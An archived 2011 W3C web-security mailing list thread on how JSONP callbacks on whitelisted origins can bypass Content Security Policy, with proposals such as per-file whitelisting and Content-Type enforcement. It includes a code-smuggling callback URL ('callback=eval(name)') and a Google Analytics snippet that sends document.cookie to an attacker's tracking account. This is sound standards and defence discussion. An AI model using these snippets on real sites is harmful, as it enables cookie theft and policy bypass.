Re: CSP and jsonp callbacks from sird@rckc.at on 2011-05-30 (public-web-security@w3.org from May 2011)

From: <sird@rckc.at>
Date: Mon, 30 May 2011 13:36:07 -0500
To: Adam Barth <w3c@adambarth.com>
Cc: public-web-security@w3.org, masatokinugawa@gmail.com
Message-ID: <BANLkTikAtbQp2WpdTG2cqnUnegR2b310QQ@mail.gmail.com>

It's an example :P

but ok, let's say the attacker uses:

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-evil-1']);
  _gaq.push(['_trackPageview']);
  _gaq.push(['_trackEvent', 'cookies', 'add', document.cookie]);

And uses google analytics to send data back to the attacker.

Or let's say the attacker iframes youtube.com and loads a payload
inside a gadget in youtube.

Or let's say the attacker does the attack directly with XHR.


-- Eduardo




On Mon, May 30, 2011 at 1:00 PM, Adam Barth <w3c@adambarth.com> wrote:
> On Mon, May 30, 2011 at 10:37 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
>> Hi List.
>>
>> I think this issue has came up before (can't find the thread but I've
>> seen it) and Masato (cc'd) brought this up to us recently.
>>
>> What can a CSP user do in the following case:
>>
>> 1. www.mozilla.org trusts scripts from www.youtube.com because they
>> use one of their scripts.
>> 2. Attacker is able to do
>> www.youtube.com/video/export?id=1337&callback=eval(name)
>
> Won't that be blocked because eval is blocked?
>
> Adam
>
>
>> 3. Then Mozilla isn't capable of protecting using CSP.
>>
>> In general, Mozilla can't realistically know all the things we put in
>> www.youtube.com. If Youtube doesn't care about CSP, there's no reason
>> for them to fix it. And Mozilla might not be able to mirror the script
>> to their own servers because it might change at any moment, and their
>> site might break.
>>
>> Could it be possible to whitelist specific files, instead of complete
>> origins? Maybe even global expressions (e.g.
>> www.youtube.com/scripts/*.js)?
>> Or.. maybe Mozilla shouldn't trust Youtube at all?
>> What about.. Content-Type enforcement? Force scripts allowed on a CSP
>> document to have the right Content-Type.
>>
>> How does this apply for the use case of stats services, captcha, ads,
>> etc.. which all require external scripts?
>>
>> I think forcing the right Content-Type for scripts might be the best
>> solution, and maybe a rule to override this behavior, comments?
>>
>> Thanks!!
>>
>> -- Eduardo
>>
>>
>

Received on Monday, 30 May 2011 18:36:54 UTC